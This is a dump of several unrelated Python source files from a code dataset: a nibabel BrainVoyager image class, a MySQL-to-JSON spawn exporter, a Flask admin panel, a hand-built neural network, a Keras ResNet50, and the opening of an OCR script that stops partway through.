@framing_cube.setter\n def framing_cube(self, fc):\n \"\"\"Set the dimensions of the framing cube.\n\n Set the dimensions of the framing cube that constitutes the\n coordinate system boundaries for the bounding box\n For most BV file formats this need to be guessed from\n x_end, y_end, and z_end in the header.\n Use this if you know about the framing cube for the BV file.\n \"\"\"\n self._framing_cube = fc\n\n def get_bbox_center(self):\n \"\"\"Get the center coordinate of the bounding box.\n\n Get the center coordinate of the bounding box with respect to the\n framing cube.\n \"\"\"\n hdr = self._hdr_dict\n x = (hdr['x_start'] +\n ((hdr['x_end'] - hdr['x_start']) / 2))\n y = (hdr['y_start'] +\n ((hdr['y_end'] - hdr['y_start']) / 2))\n z = (hdr['z_start'] +\n ((hdr['z_end'] - hdr['z_start']) / 2))\n return z, y, x\n\n def get_zooms(self):\n shape = self.get_data_shape()\n return tuple(float(self._hdr_dict['resolution'])\n for d in shape[0:3])\n\n def set_zooms(self, zooms):\n \"\"\"Set the zooms for the image.\n\n Voxel dimensions of functional data in BV file formats are\n always in relationship to the voxel dimensions in a VMR file and\n therefore need to be equal for all three spatial dimensions.\n\n Parameters\n ----------\n zooms : int or sequence\n An integer or a sequence of integers specifying the relationship\n between voxel dimensions and real-world dimensions. If a single\n integer is used it is applied to all spatial dimensions. If a\n sequence of integers is used all dimensions have to be equal.\n \"\"\"\n if type(zooms) == int:\n self._hdr_dict['resolution'] = zooms\n else:\n if np.any(np.diff(zooms)):\n raise BvError('Zooms for all dimensions must be equal!')\n else:\n self._hdr_dict['resolution'] = int(zooms[0])\n\n def as_analyze_map(self):\n raise NotImplementedError\n\n def set_data_offset(self, offset):\n \"\"\"Set offset into data file to read data.\"\"\"\n self._data_offset = offset\n\n def get_data_offset(self):\n \"\"\"Return offset into data file to read data.\"\"\"\n self.set_data_offset(calc_BV_header_size(\n self.hdr_dict_proto, self._hdr_dict))\n return self._data_offset\n\n def get_slope_inter(self):\n \"\"\"BV formats do not do scaling.\"\"\"\n return None, None\n\n def write_to(self, fileobj):\n \"\"\"Write header to fileobj.\n\n Write starts at fileobj current file position.\n\n Parameters\n ----------\n fileobj : file-like object\n Should implement ``write`` method\n\n Returns\n -------\n None\n \"\"\"\n binaryblock = pack_BV_header(self.hdr_dict_proto, self._hdr_dict)\n fileobj.write(binaryblock)\n\n def check_fix(self, logger=None, error_level=None):\n \"\"\"Check BV header with checks.\"\"\"\n if logger is None:\n logger = imageglobals.logger\n if error_level is None:\n error_level = imageglobals.error_level\n battrun = BatteryRunner(self.__class__._get_checks())\n self, reports = battrun.check_fix(self)\n for report in reports:\n report.log_raise(logger, error_level)\n\n @classmethod\n def _get_checks(klass):\n \"\"\"Return sequence of check functions for this class\"\"\"\n return (klass._chk_fileversion,)\n\n ''' Check functions in format expected by BatteryRunner class '''\n\n @classmethod\n def _chk_fileversion(klass, hdr, fix=False):\n rep = Report(HeaderDataError)\n if 'version' in hdr._hdr_dict:\n version = hdr._hdr_dict['version']\n if version in klass.supported_fileversions:\n return hdr, rep\n else:\n rep.problem_level = 40\n rep.problem_msg = 'fileversion %d is not supported' % version\n if fix:\n rep.fix_msg = 'not attempting fix'\n return hdr, rep\n return hdr, rep\n\n\nclass BvFileImage(SpatialImage):\n \"\"\"Class to hold information from a BV image file.\"\"\"\n\n # Set the class of the corresponding header\n header_class = BvFileHeader\n\n # Set the label ('image') and the extension ('.bv') for a (dummy) BV file\n files_types = (('image', '.bv'),)\n\n # BV files are not compressed...\n _compressed_exts = ()\n\n # use the row-major CArrayProxy\n ImageArrayProxy = CArrayProxy\n\n def update_header(self):\n \"\"\"Harmonize header with image data and affine.\n\n >>> data = np.zeros((2,3,4))\n >>> affine = np.diag([1.0,2.0,3.0,1.0])\n >>> img = SpatialImage(data, affine)\n >>> hdr = img.get_header()\n >>> img.shape == (2, 3, 4)\n True\n >>> img.update_header()\n >>> hdr.get_data_shape() == (2, 3, 4)\n True\n >>> hdr.get_zooms()\n (1.0, 2.0, 3.0)\n \"\"\"\n hdr = self._header\n shape = self._dataobj.shape\n # We need to update the header if the data shape has changed. It's a\n # bit difficult to change the data shape using the standard API, but\n # maybe it happened\n if hdr.get_data_shape() != shape:\n hdr.set_data_shape(shape)\n\n @classmethod\n def from_file_map(klass, file_map):\n \"\"\"Load image from `file_map`.\n\n Parameters\n ----------\n file_map : None or mapping, optional\n files mapping. If None (default) use object's ``file_map``\n attribute instead\n \"\"\"\n bvf = file_map['image'].get_prepare_fileobj('rb')\n header = klass.header_class.from_fileobj(bvf)\n affine = header.get_affine()\n hdr_copy = header.copy()\n # use row-major memory presentation!\n data = klass.ImageArrayProxy(bvf, hdr_copy)\n img = klass(data, affine, header, file_map=file_map)\n img._load_cache = {'header': hdr_copy,\n 'affine': None,\n 'file_map': copy_file_map(file_map)}\n return img\n\n def _write_header(self, header_file, header):\n \"\"\"Utility routine to write BV header.\n\n Parameters\n ----------\n header_file : file-like\n file-like object implementing ``write``, open for writing\n header : header object\n \"\"\"\n header.write_to(header_file)\n\n def _write_data(self, bvfile, data, header):\n \"\"\"Utility routine to write BV image.\n\n Parameters\n ----------\n bvfile : file-like\n file-like object implementing ``seek`` or ``tell``, and\n ``write``\n data : array-like\n array to write\n header : analyze-type header object\n header\n \"\"\"\n shape = header.get_data_shape()\n if data.shape != shape:\n raise HeaderDataError('Data should be shape (%s)' %\n ', '.join(str(s) for s in shape))\n offset = header.get_data_offset()\n out_dtype = header.get_data_dtype()\n array_to_file(data, bvfile, out_dtype, offset, order='C')\n\n def to_file_map(self, file_map=None):\n \"\"\"Write image to `file_map` or contained ``self.file_map``.\n\n Parameters\n ----------\n file_map : None or mapping, optional\n files mapping. If None (default) use object's ``file_map``\n attribute instead\n \"\"\"\n if file_map is None:\n file_map = self.file_map\n data = self.get_data()\n with file_map['image'].get_prepare_fileobj('wb') as bvf:\n self._write_header(bvf, self.header)\n self._write_data(bvf, data, self.header)\n self.file_map = file_map\n","sub_path":"nibabel/brainvoyager/bv.py","file_name":"bv.py","file_ext":"py","file_size_in_byte":34901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"8837402","text":"import json\nimport pymysql.cursors\n\njsonFile=\"spawns.json\"\n\ndef checkValidJSON(file):\n try:\n with open(file) as f:\n spawns = json.load(f)\n f.close()\n return True\n except:\n return False\n\nif __name__ == '__main__':\n valid=checkValidJSON(jsonFile)\n sqlHost='192.168.1.4'\n sqlUser='root'\n sqlPass=''\n sqlDB='pokemongomapdb'\n connection = pymysql.connect(host=str(sqlHost),\n user=str(sqlUser),\n password=str(sqlPass),\n db=str(sqlDB),\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n try:\n with connection.cursor() as cursor:\n sql = \"select distinct latitude as lat, longitude as lng, count(*) as spawn_count, spawnpoint_id, ((extract(minute from cast(disappear_time as time)) * 60 + extract(second from cast(disappear_time as time))) + 2701) % 3600 as time from pokemon where spawnpoint_id NOT IN ('') group by lat, lng, time HAVING spawn_count > 4 order by time;\"\n cursor.execute(sql)\n result=cursor.fetchall() \n output=[]\n for row in result:\n checkTime=str(row['time'])\n if checkTime!=\"\": \n spawn= {'lat':float(row['lat']), 'lng':float(row['lng']), 'time':row['time']} \n output.append(spawn) \n wf=open(jsonFile,'w')\n json.dump(output,wf)\n wf.close() \n finally:\n connection.close()\n msg=(\"File: 'spawns.json' created from MySQL DB: \"+sqlDB)\n","sub_path":"getspawns.py","file_name":"getspawns.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"458326436","text":"import serial, sys, time, os, bz2, gc\n\n# connect to device\nser = serial.Serial(sys.argv[1], 2000000, timeout=0.1)\n\nfor i in range(0,30):\n data = []\n for j in range(0,64):\n data = data + [0x00]\n\n #print(data)\n\n ser.write(bytes(data))\n","sub_path":"Scripts/recover.py","file_name":"recover.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88401020","text":"\"\"\"\n功能:输入一个正整数,按照从小到大的顺序输出它的所有质数的因子(如180的质数因子为2 2 3 3 5 )\n最后一个数后面也要有空格\n\n详细描述:\n\n函数接口说明:\npublic String getResult(long ulDataInput)\n输入参数:\nlong ulDataInput:输入的正整数\n返回值:\nString\n\"\"\"\na, res = int(input()), []\nfor i in range(2, a // 2 + 1):\n while a % i == 0:\n a = a / i\n res.append(i)\nprint(\" \".join(map(str, res)) + \" \" if res else str(a) + \" \")","sub_path":"Learning/likou/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"73434521","text":"from flask import request, render_template, session, current_app, redirect, url_for, Blueprint\nfrom model import db\nfrom model.admin import admin_account\nfrom model.driver import driver_account\nfrom model.adv import adv_info, adv_account\nimport hashlib\nfrom model.LBS import *\n\nadmin_bp = Blueprint('admin', __name__)\n\n\n@admin_bp.route('/')\n@admin_bp.route('/home')\n@admin_bp.route('/index.html')\ndef index():\n return render_template('Management module/index.html', name=session['admin_account_name'])\n\n\n@admin_bp.route('/login')\ndef login():\n return render_template('Management module/login.html')\n\n\n@admin_bp.route('/check_login', methods=['POST'])\ndef check_login():\n account_name = request.form['account']\n password = request.form['password']\n admin = admin_account.query.filter_by(account_name=account_name).first()\n if admin == None:\n return ''\n else:\n if admin.check(password):\n session['admin_account_id'] = admin.account_ID\n session['admin_account_name'] = admin.account_name\n return redirect(url_for('admin.index'))\n else:\n return ''\n\n\n@admin_bp.route('/show_drivers')\ndef show_drivers():\n return render_template('Management module/drivers.html')\n\n\n@admin_bp.route('/drivers_ajax')\ndef drivers_ajax():\n drivers = driver_account.query.all()\n ajax = []\n for driver in drivers:\n dic = {}\n dic[\"account_ID\"] = driver.account_ID\n dic[\"user_name\"] = driver.user_name\n dic[\"phone\"] = driver.phone\n dic[\"check_flag\"] = str(driver.check_flag)\n ajax.append(dic)\n return str(ajax)\n\n\n@admin_bp.route('/show_driver/')\ndef show_driver(ID):\n if ID == None:\n return redirect(url_for('admin.show_drivers'))\n else:\n driver = driver_account.query.filter_by(account_ID=ID).first()\n return render_template('Management module/driver.html', phone=driver.phone, flag=str(driver.check_flag),\n name=driver.user_name, user_id=driver.user_ID, permit_image=driver.permit_pic,\n ID_card_image=driver.card_pic)\n\n\n@admin_bp.route('/check_driver', methods=['GET'])\ndef check_driver():\n phone = request.args['phone']\n flag = bool(int(request.args['flag']))\n driver = driver_account.query.filter_by(phone=phone).first()\n driver.check_flag = flag\n db.session.commit()\n return \"success\"\n\n\n@admin_bp.route('/show_advs')\ndef show_advs():\n return render_template('Management module/ads.html')\n\n\n@admin_bp.route('/advs_ajax')\ndef advs_ajax():\n advs = adv_info.query.all()\n ajax = []\n for adv in advs:\n dic = {}\n dic['adv_ID'] = adv.adv_ID\n dic['adv_amounts'] = adv.amounts\n dic['adv_text'] = adv.adv_text\n dic['cost'] = float(adv.cost.real)\n dic['date'] = str(adv.start_date)\n advter = adv_account.query.filter_by(account_ID=adv.advter_account_ID).first()\n dic['company'] = advter.company_name\n ajax.append(dic)\n return str(ajax)\n\n\n@admin_bp.route('/adv/')\ndef show_adv(adv_ID):\n if adv_ID == None:\n return redirect(url_for('admin.show_advs'))\n else:\n adv = adv_info.query.filter_by(adv_ID=adv_ID).first()\n advter = adv_account.query.filter_by(account_ID=adv.advter_account_ID).first()\n date = str(adv.start_time) + '-' + str(adv.end_time)\n location = []\n location_json = json.loads(adv.location)\n for point in location_json:\n location.append(gcj02tobd09(point[0], point[1]))\n return render_template('Management module/ad.html', adv_ID=adv.adv_ID, text=adv.adv_text, datetime=date,\n location=location, company=advter.company_name)\n\n\n@admin_bp.route('/show_advters')\ndef show_advters():\n return render_template('Management module/adusers.html')\n\n\n@admin_bp.route('/advters_ajax')\ndef advters_ajax():\n advters = adv_account.query.all()\n ajax = []\n for advter in advters:\n dic = {}\n dic[\"account_ID\"] = advter.account_ID\n dic[\"charge_name\"] = advter.charge_name\n dic[\"company_name\"] = advter.company_name\n dic[\"check_flag\"] = str(advter.check_flag)\n ajax.append(dic)\n return str(ajax)\n\n\n@admin_bp.route('/show_advter/')\ndef show_advter(account_ID):\n if account_ID == None:\n return redirect(url_for('admin.show_advters'))\n else:\n advter = adv_account.query.filter_by(account_ID=account_ID).first()\n return render_template('Management module/aduser.html', account_ID=account_ID, flag=advter.check_flag,\n company=advter.company_name, amount=advter.adv_amount, name=advter.charge_name,\n phone=advter.phone, remark=advter.remark)\n\n\n@admin_bp.route('/check_advter', methods=['GET'])\ndef check_advter():\n account_ID = request.args['account_ID']\n flag = bool(int(request.args['flag']))\n advter = adv_account.query.filter_by(account_ID=account_ID).first()\n advter.check_flag = flag\n db.session.commit()\n return \"success\"\n","sub_path":"controller/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"62125501","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n# Copyright 2021 Giovanni Dispoto\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Contains definitions for the original form of Residual Networks.\n\nThe 'v1' residual networks (ResNets) implemented in this module were proposed\nby:\n[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun\n Deep Residual Learning for Image Recognition. arXiv:1512.03385\n\nOther variants were introduced in:\n[2] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun\n Identity Mappings in Deep Residual Networks. arXiv: 1603.05027\n\nThe networks defined in this module utilize the bottleneck building block of\n[1] with projection shortcuts only for increasing depths. They employ batch\nnormalization *after* every weight layer. This is the architecture used by\nMSRA in the Imagenet and MSCOCO 2016 competition models ResNet-101 and\nResNet-152. See [2; Fig. 1a] for a comparison between the current 'v1'\narchitecture and the alternative 'v2' architecture of [2] which uses batch\nnormalization *before* every weight layer in the so-called full pre-activation\nunits.\n\nTypical use:\n\n from tf_slim.nets import resnet_v1\n\nResNet-101 for image classification into 1000 classes:\n\n # inputs has shape [batch, 224, 224, 3]\n with slim.arg_scope(resnet_v1.resnet_arg_scope()):\n net, end_points = resnet_v1.resnet_v1_101(inputs, 1000, is_training=False)\n\nResNet-101 for semantic segmentation into 21 classes:\n\n # inputs has shape [batch, 513, 513, 3]\n with slim.arg_scope(resnet_v1.resnet_arg_scope()):\n net, end_points = resnet_v1.resnet_v1_101(inputs,\n 21,\n is_training=False,\n global_pool=False,\n output_stride=16)\ncredits: https://medium.com/analytics-vidhya/understanding-and-implementation-of-residual-networks-resnets-b80f9a507b9c\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\n\ndef resnet_v1_50(num_classes=1000,\n is_training=True,\n dropout_keep_prob=0.5,\n spatial_squeeze=True,\n weight_decay = 0.0005,\n reuse=None,\n fc_conv_padding='VALID',\n network_depth = None,\n global_pool=False):\n \"\"\"Generator for v1 ResNet models.\n\n This function generates a family of ResNet v1 models. See the resnet_v1_*()\n methods for specific model instantiations, obtained by selecting different\n block instantiations that produce ResNets of various depths.\n\n Training for image classification on Imagenet is usually done with [224, 224]\n inputs, resulting in [7, 7] feature maps at the output of the last ResNet\n block for the ResNets defined in [1] that have nominal stride equal to 32.\n However, for dense prediction tasks we advise that one uses inputs with\n spatial dimensions that are multiples of 32 plus 1, e.g., [321, 321]. In\n this case the feature maps at the ResNet output will have spatial shape\n [(height - 1) / output_stride + 1, (width - 1) / output_stride + 1]\n and corners exactly aligned with the input image corners, which greatly\n facilitates alignment of the features to the image. Using as input [225, 225]\n images results in [8, 8] feature maps at the output of the last ResNet block.\n\n For dense prediction tasks, the ResNet needs to run in fully-convolutional\n (FCN) mode and global_pool needs to be set to False. The ResNets in [1, 2] all\n have nominal stride equal to 32 and a good choice in FCN mode is to use\n output_stride=16 in order to increase the density of the computed features at\n small computational and memory overhead, cf. http://arxiv.org/abs/1606.00915.\n\n Args:\n inputs: A tensor of size [batch, height_in, width_in, channels].\n blocks: A list of length equal to the number of ResNet blocks. Each element\n is a resnet_utils.Block object describing the units in the block.\n num_classes: Number of predicted classes for classification tasks.\n If 0 or None, we return the features before the logit layer.\n is_training: whether batch_norm layers are in training mode. If this is set\n to None, the callers can specify slim.batch_norm's is_training parameter\n from an outer slim.arg_scope.\n global_pool: If True, we perform global average pooling before computing the\n logits. Set to True for image classification, False for dense prediction.\n output_stride: If None, then the output will be computed at the nominal\n network stride. If output_stride is not None, it specifies the requested\n ratio of input to output spatial resolution.\n include_root_block: If True, include the initial convolution followed by\n max-pooling, if False excludes it.\n spatial_squeeze: if True, logits is of shape [B, C], if false logits is\n of shape [B, 1, 1, C], where B is batch_size and C is number of classes.\n To use this parameter, the input images must be smaller than 300x300\n pixels, in which case the output logit layer does not contain spatial\n information and can be removed.\n store_non_strided_activations: If True, we compute non-strided (undecimated)\n activations at the last unit of each block and store them in the\n `outputs_collections` before subsampling them. This gives us access to\n higher resolution intermediate activations which are useful in some\n dense prediction problems but increases 4x the computation and memory cost\n at the last unit of each block.\n reuse: whether or not the network and its variables should be reused. To be\n able to reuse 'scope' must be given.\n scope: Optional variable_scope.\n\n Returns:\n net: A rank-4 tensor of size [batch, height_out, width_out, channels_out].\n If global_pool is False, then height_out and width_out are reduced by a\n factor of output_stride compared to the respective height_in and width_in,\n else both height_out and width_out equal one. If num_classes is 0 or None,\n then net is the output of the last ResNet block, potentially after global\n average pooling. If num_classes a non-zero integer, net contains the\n pre-softmax activations.\n end_points: A dictionary from components of the network to the corresponding\n activation.\n\n Raises:\n ValueError: If the target output_stride is not valid.\n \"\"\"\n \"\"\"\n Implementation of the popular ResNet50 the following architecture:\n CONV2D -> BATCHNORM -> RELU -> MAXPOOL -> CONVBLOCK -> IDBLOCK*2 -> CONVBLOCK -> IDBLOCK*3\n -> CONVBLOCK -> IDBLOCK*5 -> CONVBLOCK -> IDBLOCK*2 -> AVGPOOL -> TOPLAYER\n\n Arguments:\n input_shape -- shape of the images of the dataset\n classes -- integer, number of classes\n\n Returns:\n model -- a Model() instance in Keras\n \"\"\"\n \n # Define the input as a tensor with shape input_shape\n X_input = tf.keras.Input(shape=[224, 224, 3])\n\n if weight_decay == None:\n kernel_regularizer = None\n else:\n kernel_regularizer = tf.keras.regularizers.L2(weight_decay) \n \n if network_depth != None:\n initial_size = network_depth\n else: \n initial_size = 3 #Defalut size is 3, as the original resnet 50\n\n starting_size = initial_size \n # Zero-Padding\n X = tf.keras.layers.ZeroPadding2D((3, 3))(X_input)\n \n # Stage 1\n X = tf.keras.layers.Conv2D(64, (7, 7), strides = (2, 2), name = 'conv1', kernel_regularizer=kernel_regularizer)(X)\n X = tf.keras.layers.BatchNormalization(axis = 3, name = 'bn_conv1')(X)\n X = tf.keras.layers.Activation('relu')(X)\n X = tf.keras.layers.MaxPooling2D((3, 3), strides=(2, 2))(X)\n\n # Stage 2\n X = convolutional_block(X, f = 3, filters = [64, 64, 256], stage = 2, block='0', s = 1, kernel_regularizer = kernel_regularizer)\n for i in range(initial_size-1):\n X = identity_block(X, 3, [64, 64, 256], stage=2, block=\"a\"+str(i), kernel_regularizer = kernel_regularizer)\n #X = identity_block(X, 3, [64, 64, 256], stage=2, block='c',kernel_regularizer = kernel_regularizer)\n\n initial_size = initial_size + 1\n # Stage 3 \n X = convolutional_block(X, f = 3, filters = [128, 128, 512], stage = 3, block='1', s = 2, kernel_regularizer = kernel_regularizer)\n for i in range(initial_size-1):\n X = identity_block(X, 3, [128, 128, 512], stage=3, block=\"b\"+str(i), kernel_regularizer = kernel_regularizer)\n #X = identity_block(X, 3, [128, 128, 512], stage=3, block='c', kernel_regularizer = kernel_regularizer)\n #X = identity_block(X, 3, [128, 128, 512], stage=3, block='d', kernel_regularizer = kernel_regularizer)\n \n initial_size = (starting_size) * 2 \n # Stage 4 \n X = convolutional_block(X, f = 3, filters = [256, 256, 1024], stage = 4, block='a', s = 2, kernel_regularizer = kernel_regularizer)\n for i in range(initial_size - 1):\n X = identity_block(X, 3, [256, 256, 1024], stage=4, block='c'+str(i),kernel_regularizer = kernel_regularizer)\n #X = identity_block(X, 3, [256, 256, 1024], stage=4, block='c',kernel_regularizer = kernel_regularizer)\n #X = identity_block(X, 3, [256, 256, 1024], stage=4, block='d',kernel_regularizer = kernel_regularizer)\n #X = identity_block(X, 3, [256, 256, 1024], stage=4, block='e',kernel_regularizer = kernel_regularizer)\n #X = identity_block(X, 3, [256, 256, 1024], stage=4, block='f',kernel_regularizer = kernel_regularizer)\n\n # Stage 5 \n X = convolutional_block(X, f = 3, filters = [512, 512, 2048], stage = 5, block='2', s = 2, kernel_regularizer = kernel_regularizer)\n for i in range(starting_size - 1):\n X = identity_block(X, 3, [512, 512, 2048], stage=5, block='d'+str(i), kernel_regularizer = kernel_regularizer)\n #X = identity_block(X, 3, [512, 512, 2048], stage=5, block='c', kernel_regularizer = kernel_regularizer)\n\n # AVGPOOL . Use \"X = AveragePooling2D(...)(X)\"\n X = tf.keras.layers.AveragePooling2D()(X)\n\n # output layer\n X = tf.keras.layers.Flatten()(X)\n X = tf.keras.layers.Dense(256)(X)\n X = tf.keras.layers.Dropout(dropout_keep_prob)(X)\n X = tf.keras.layers.Dense(num_classes, activation='softmax', name='fc' + str(num_classes), kernel_regularizer = kernel_regularizer)(X)\n \n # Create model\n model = tf.keras.Model(inputs = X_input, outputs = X, name='ResNet50')\n\n return model\n\ndef convolutional_block(X, f, filters, stage, block, s = 2, kernel_regularizer = None):\n \"\"\"\n Implementation of the convolutional block\n \n Arguments:\n X -- input tensor of shape (m, n_H_prev, n_W_prev, n_C_prev)\n f -- integer, specifying the shape of the middle CONV's window for the main path\n filters -- python list of integers, defining the number of filters in the CONV layers of the main path\n stage -- integer, used to name the layers, depending on their position in the network\n block -- string/character, used to name the layers, depending on their position in the network\n s -- Integer, specifying the stride to be used\n \n Returns:\n X -- output of the convolutional block, tensor of shape (n_H, n_W, n_C)\n \"\"\"\n \n # defining name basis\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n \n # Retrieve Filters\n F1, F2, F3 = filters\n \n # Save the input value\n X_shortcut = X\n\n\n ##### MAIN PATH #####\n # First component of main path \n X = tf.keras.layers.Conv2D(F1, (1, 1), strides = (s,s), name = conv_name_base + '2a', kernel_regularizer = kernel_regularizer)(X)\n X = tf.keras.layers.BatchNormalization(axis = 3, name = bn_name_base + '2a')(X)\n X = tf.keras.layers.Activation('relu')(X)\n \n\n # Second component of main path \n X = tf.keras.layers.Conv2D(F2, (f,f), strides = (1,1), padding = 'same', name = conv_name_base + '2b', kernel_regularizer = kernel_regularizer)(X)\n X = tf.keras.layers.BatchNormalization(axis = 3, name = bn_name_base + '2b')(X)\n X = tf.keras.layers.Activation('relu') (X)\n\n # Third component of main path \n X = tf.keras.layers.Conv2D(F3, (1,1), strides = (1,1), padding = 'valid', name = conv_name_base + '2c', kernel_regularizer = kernel_regularizer)(X)\n X = tf.keras.layers.BatchNormalization(axis = 3, name = bn_name_base + '2c')(X)\n\n ##### SHORTCUT PATH #### \n X_shortcut = tf.keras.layers.Conv2D(F3, (1,1), strides = (s,s), padding = 'valid', name = conv_name_base + '1', kernel_regularizer = kernel_regularizer)(X_shortcut)\n X_shortcut = tf.keras.layers.BatchNormalization(axis = 3, name = bn_name_base + '1')(X_shortcut)\n\n # Final step: Add shortcut value to main path, and pass it through a RELU activation \n X = tf.keras.layers.Add()([X, X_shortcut])\n X = tf.keras.layers.Activation('relu')(X)\n \n \n return X\n\ndef identity_block(X, f, filters, stage, block, kernel_regularizer = None):\n \"\"\"\n Implementation of the identity block\n \n Arguments:\n X -- input tensor of shape (m, n_H_prev, n_W_prev, n_C_prev)\n f -- integer, specifying the shape of the middle CONV's window for the main path\n filters -- python list of integers, defining the number of filters in the CONV layers of the main path\n stage -- integer, used to name the layers, depending on their position in the network\n block -- string/character, used to name the layers, depending on their position in the network\n \n Returns:\n X -- output of the identity block, tensor of shape (n_H, n_W, n_C)\n \"\"\"\n \n # defining name basis\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n \n # Retrieve Filters\n F1, F2, F3 = filters\n \n # Save the input value. You'll need this later to add back to the main path. \n X_shortcut = X\n \n # First component of main path\n X = tf.keras.layers.Conv2D(filters = F1, kernel_size = (1, 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2a', kernel_regularizer = kernel_regularizer)(X)\n X = tf.keras.layers.BatchNormalization(axis = 3, name = bn_name_base + '2a')(X)\n X = tf.keras.layers.Activation('relu')(X)\n \n \n # Second component of main path\n X = tf.keras.layers.Conv2D(filters = F2, kernel_size = (f, f), strides = (1,1), padding = 'same', name = conv_name_base + '2b', kernel_regularizer = kernel_regularizer)(X)\n X = tf.keras.layers.BatchNormalization(axis = 3, name = bn_name_base + '2b')(X)\n X = tf.keras.layers.Activation('relu')(X)\n\n # Third component of main path \n X = tf.keras.layers.Conv2D(filters = F3, kernel_size = (1, 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2c', kernel_regularizer = kernel_regularizer)(X)\n X = tf.keras.layers.BatchNormalization(axis = 3, name = bn_name_base + '2c')(X)\n\n # Final step: Add shortcut value to main path, and pass it through a RELU activation \n X = tf.keras.layers.Add()([X, X_shortcut])\n X = tf.keras.layers.Activation('relu')(X)\n \n \n return X \n\nresnet_v1_50.default_image_size = 224\n","sub_path":"apps/tf/slim/nets/resnet_v1.py","file_name":"resnet_v1.py","file_ext":"py","file_size_in_byte":15468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"496063607","text":"import numpy as np\nimport math,random\nfrom tqdm import tqdm\n\ndef step_function(x):\n return 1 if x >= 0 else 0\n\ndef perceptron_output(weights, bias, x):\n '''Returns 1 if the perceptrion 'fires', 0 if not '''\n return step_function(np.dot(weights, x) + bias)\n\ndef sigmoid(t):\n return 1 / (1 + math.exp(-t))\n\ndef neuron_output(weights, inputs):\n return sigmoid(np.dot(weights, inputs))\n\ndef feed_forward(neural_network, input_vector):\n \"\"\"takes in a neural network (represented as a list of lists of lists of weights)\n and returns the output from forward-propagating the input\"\"\"\n\n outputs = []\n\n for layer in neural_network:\n\n input_with_bias = input_vector + [1] # add a bias input\n output = [neuron_output(neuron, input_with_bias) # compute the output\n for neuron in layer] # for this layer\n outputs.append(output) # and remember it\n\n # the input to the next layer is the output of this one\n input_vector = output\n\n return outputs\n \ndef backpropagate(network, input_vector, targets):\n hidden_outputs, outputs = feed_forward(network, input_vector)\n\n # the output * (1 - output) is from the derivative of sigmoid\n output_deltas = [output * (1 - output) * (output - target) for output, target in zip(outputs, targets)]\n # adjust weights for output layer, one neuron at a time\n for i, output_neuron in enumerate(network[-1]):\n # focus on the ith output layer neuron\n for j, hidden_output in enumerate(hidden_outputs + [1]):\n # adjust the jth weight based on both\n # this neuron's delta and its jth input\n output_neuron[j] -= output_deltas[i] * hidden_output\n # back-propagate errors to hidden layer\n hidden_deltas = [hidden_output * (1 - hidden_output) * np.dot(output_deltas, [n[i] for n in network[-1]])for i, hidden_output in enumerate(hidden_outputs)]\n \n # adjust weights for hidden layer, one neuron at a time\n for i, hidden_neuron in enumerate(network[0]):\n for j, input in enumerate(input_vector + [1]):\n hidden_neuron[j] -= hidden_deltas[i] * input\n\ndef train(inputs, targets, training_iterations=1000):\n print(\"Training network...:\")\n ###########\n # Opsætning af Neural Network\n ###########\n random.seed(0) # to get repeatable results\n input_size = 7 # antal af input noder (samme antal som feautures)\n num_hidden = 5 # antal af hidden noder\n output_size = 7 # antal af output noder (i vores tilfælde, genres)\n\n\n # each hidden neuron has one weight per input, plus a bias weight\n hidden_layer = [[random.random() for __ in range(input_size + 1)] for __ in range(num_hidden)]\n\n # each output neuron has one weight per hidden neuron, plus a bias weight\n output_layer = [[random.random() for __ in range(num_hidden + 1)] for __ in range(output_size)]\n\n # the network starts out with random weights\n network = [hidden_layer, output_layer]\n\n for __ in tqdm(range(training_iterations)):\n for input_vector, target_vector in zip(inputs, targets):\n backpropagate(network, input_vector, target_vector)\n\n return network","sub_path":"src/models/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"469411104","text":"import os\nimport sys\nimport cv2\nimport math\nimport time\nimport torch\nimport random\nimport argparse\nimport numpy as np\nimport unicodedata as ud\nfrom models import resnet50\nimport torch.nn.functional as F\nfrom utils import np_to_variable\nfrom utils import locality_aware_nms\nfrom utils.ocr_util import print_seq_text\nfrom utils.rbox_util import restore_rectangle\nfrom PIL import ImageFont\nfrom PIL import Image\nfrom PIL import ImageDraw\n\nf = open('files/codec.txt', 'r')\ncodec = f.readlines()[0]\nf.close()\nprint(len(codec))\n\n\ndef get_images(test_data_path):\n \"\"\"\n find image files in test data path\n :return: list of files found\n \"\"\"\n files = []\n exts = ['jpg', 'png', 'jpeg', 'JPG']\n for parent, dirnames, filenames in os.walk(test_data_path):\n for filename in filenames:\n for ext in exts:\n if filename.endswith(ext):\n files.append(os.path.join(parent, 